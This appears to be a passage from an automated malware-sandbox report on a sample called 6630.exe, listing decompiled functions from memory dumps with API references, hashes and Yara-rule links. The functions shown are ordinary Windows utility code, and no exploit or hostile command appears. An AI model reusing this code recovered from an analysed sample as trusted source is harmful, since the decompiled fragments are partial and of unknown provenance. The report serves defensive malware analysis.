                                                                                                                            • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                                            • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                            • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 43%
                                                                                                                            			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}









                                                                                                                            0x004075bb
                                                                                                                            0x004075c2
                                                                                                                            0x004075c7
                                                                                                                            0x004075ca
                                                                                                                            0x004075cd
                                                                                                                            0x004075d8
                                                                                                                            0x004075e9
                                                                                                                            0x004075fc
                                                                                                                            0x00407600
                                                                                                                            0x00407601
                                                                                                                            0x00407606
                                                                                                                            0x00407609
                                                                                                                            0x0040760e
                                                                                                                            0x00407619
                                                                                                                            0x0040761e
                                                                                                                            0x0040761f
                                                                                                                            0x00407624
                                                                                                                            0x00407636

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: _snwprintf
                                                                                                                            • String ID: %%-%d.%ds
                                                                                                                            • API String ID: 3988819677-2008345750
                                                                                                                            • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                            • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                                            • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                            • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                                                                            0x00405080
                                                                                                                            0x00405086
                                                                                                                            0x0040508b
                                                                                                                            0x0040508e
                                                                                                                            0x00405091
                                                                                                                            0x00405097
                                                                                                                            0x0040509d
                                                                                                                            0x004050a4
                                                                                                                            0x004050ab
                                                                                                                            0x004050b2
                                                                                                                            0x004050b5
                                                                                                                            0x004050bc
                                                                                                                            0x004050cb
                                                                                                                            0x004050e0
                                                                                                                            0x004050cd
                                                                                                                            0x004050d1
                                                                                                                            0x004050dc
                                                                                                                            0x004050dc

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FileNameOpenwcscpy
                                                                                                                            • String ID: L
                                                                                                                            • API String ID: 3246554996-2909332022
                                                                                                                            • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                            • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                                            • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                            • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 58%
                                                                                                                            			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                                                                            0x00409072
                                                                                                                            0x00409074
                                                                                                                            0x0040907d
                                                                                                                            0x00409086
                                                                                                                            0x0040908e
                                                                                                                            0x004090a5
                                                                                                                            0x004090a5
                                                                                                                            0x0040908e
                                                                                                                            0x004090ac

                                                                                                                            APIs
                                                                                                                            • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc
                                                                                                                            • String ID: LookupAccountSidW$Y@
                                                                                                                            • API String ID: 190572456-2352570548
                                                                                                                            • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                            • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                                            • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                            • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 37%
                                                                                                                            			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}







                                                                                                                            0x0040ad8c
                                                                                                                            0x0040ad93
                                                                                                                            0x0040ad95
                                                                                                                            0x0040ad9d
                                                                                                                            0x0040ada5
                                                                                                                            0x0040adb2
                                                                                                                            0x0040adb2
                                                                                                                            0x0040adb5
                                                                                                                            0x0040adbf

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                              • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                              • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                              • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                            • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                                            • String ID: shlwapi.dll
                                                                                                                            • API String ID: 4092907564-3792422438
                                                                                                                            • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                            • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                                            • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                            • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                                                                            0x00406597
                                                                                                                            0x00406598
                                                                                                                            0x004065a0
                                                                                                                            0x004065aa
                                                                                                                            0x004065ac
                                                                                                                            0x004065ac
                                                                                                                            0x004065bd

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                            • wcsrchr.MSVCRT ref: 004065A0
                                                                                                                            • wcscat.MSVCRT ref: 004065B6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                            • String ID: _lng.ini
                                                                                                                            • API String ID: 383090722-1948609170
                                                                                                                            • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                            • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                                            • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                            • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                            0x0040ac59
                                                                                                                            0x0040ac60
                                                                                                                            0x0040ac68
                                                                                                                            0x0040ac6d
                                                                                                                            0x0040ac75
                                                                                                                            0x0040ac7b
                                                                                                                            0x00000000
                                                                                                                            0x0040ac7b
                                                                                                                            0x0040ac6d
                                                                                                                            0x0040ac80

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                              • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                              • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                              • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                            • API String ID: 946536540-880857682
                                                                                                                            • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                            • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                            • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                            • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 90%
                                                                                                                            			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                                                                            0x00406670
                                                                                                                            0x0040667a
                                                                                                                            0x00406680
                                                                                                                            0x00406686
                                                                                                                            0x0040668b
                                                                                                                            0x0040668d
                                                                                                                            0x00406693
                                                                                                                            0x00406699
                                                                                                                            0x0040669f
                                                                                                                            0x004066a9
                                                                                                                            0x004066ac
                                                                                                                            0x004066af
                                                                                                                            0x004066b9
                                                                                                                            0x004066c7
                                                                                                                            0x004066d9
                                                                                                                            0x004066c9
                                                                                                                            0x004066c9
                                                                                                                            0x004066cc
                                                                                                                            0x004066cf
                                                                                                                            0x004066d2
                                                                                                                            0x004066d5
                                                                                                                            0x004066d5
                                                                                                                            0x004066db
                                                                                                                            0x004066dd
                                                                                                                            0x004066e0
                                                                                                                            0x004066e8
                                                                                                                            0x004066fa
                                                                                                                            0x004066ea
                                                                                                                            0x004066ea
                                                                                                                            0x004066ed
                                                                                                                            0x004066f0
                                                                                                                            0x004066f3
                                                                                                                            0x004066f6
                                                                                                                            0x004066f6
                                                                                                                            0x004066fc
                                                                                                                            0x004066fe
                                                                                                                            0x00406701
                                                                                                                            0x00406709
                                                                                                                            0x0040671b
                                                                                                                            0x0040670b
                                                                                                                            0x0040670b
                                                                                                                            0x0040670e
                                                                                                                            0x00406711
                                                                                                                            0x00406714
                                                                                                                            0x00406717
                                                                                                                            0x00406717
                                                                                                                            0x0040671d
                                                                                                                            0x0040671f
                                                                                                                            0x00406722
                                                                                                                            0x0040672a
                                                                                                                            0x0040673c
                                                                                                                            0x0040672c
                                                                                                                            0x0040672c
                                                                                                                            0x0040672f
                                                                                                                            0x00406732
                                                                                                                            0x00406735
                                                                                                                            0x00406738
                                                                                                                            0x00406738
                                                                                                                            0x0040673f
                                                                                                                            0x00406745

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ??2@$memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1860491036-0
                                                                                                                            • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                            • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                                            • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                            • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                                                                            0x004054ea
                                                                                                                            0x004054ec
                                                                                                                            0x004054f1
                                                                                                                            0x004054f4
                                                                                                                            0x004054f7
                                                                                                                            0x004054fa
                                                                                                                            0x004054fe
                                                                                                                            0x00405501
                                                                                                                            0x00405505
                                                                                                                            0x00405508
                                                                                                                            0x0040550b
                                                                                                                            0x0040551b
                                                                                                                            0x0040550d
                                                                                                                            0x0040550f
                                                                                                                            0x0040550f
                                                                                                                            0x00405521
                                                                                                                            0x00405527
                                                                                                                            0x0040552b
                                                                                                                            0x0040552e
                                                                                                                            0x0040553f
                                                                                                                            0x00405530
                                                                                                                            0x00405532
                                                                                                                            0x00405532
                                                                                                                            0x00405556
                                                                                                                            0x00405561
                                                                                                                            0x0040556e
                                                                                                                            0x00405571
                                                                                                                            0x00405578
                                                                                                                            0x0040557e

                                                                                                                            APIs
                                                                                                                            • wcslen.MSVCRT ref: 004054EC
                                                                                                                            • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                                              • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                                              • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                                              • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                            • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                                            • memcpy.MSVCRT ref: 00405556
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: free$memcpy$mallocwcslen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 726966127-0
                                                                                                                            • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                            • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                                            • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                            • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 81%
                                                                                                                            			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}













                                                                                                                            0x00405adf
                                                                                                                            0x00405ae6
                                                                                                                            0x00405af5
                                                                                                                            0x00405af6
                                                                                                                            0x00405afb
                                                                                                                            0x00405b00
                                                                                                                            0x00405b0a
                                                                                                                            0x00405b18
                                                                                                                            0x00405b19
                                                                                                                            0x00405b1e
                                                                                                                            0x00405b2c
                                                                                                                            0x00405b2d
                                                                                                                            0x00405b36
                                                                                                                            0x00405b37
                                                                                                                            0x00405b3c
                                                                                                                            0x00405b4a
                                                                                                                            0x00405b4b
                                                                                                                            0x00405b54
                                                                                                                            0x00405b55
                                                                                                                            0x00405b5a
                                                                                                                            0x00405b68
                                                                                                                            0x00405b69
                                                                                                                            0x00405b72
                                                                                                                            0x00405b73
                                                                                                                            0x00405b7b
                                                                                                                            0x00000000
                                                                                                                            0x00405b7b
                                                                                                                            0x00405b80

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ??2@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1033339047-0
                                                                                                                            • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                            • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                                            • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                            • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Analysis Process: 6630.exe PID: 6420 Parent PID: 3292 6630.exeCOMMON

                                                                                                                            Executed Functions

                                                                                                                            Function 0490003C, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0490024D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.455554780.0000000004900000.00000040.00000001.sdmp, Offset: 04900000, based on PE: false
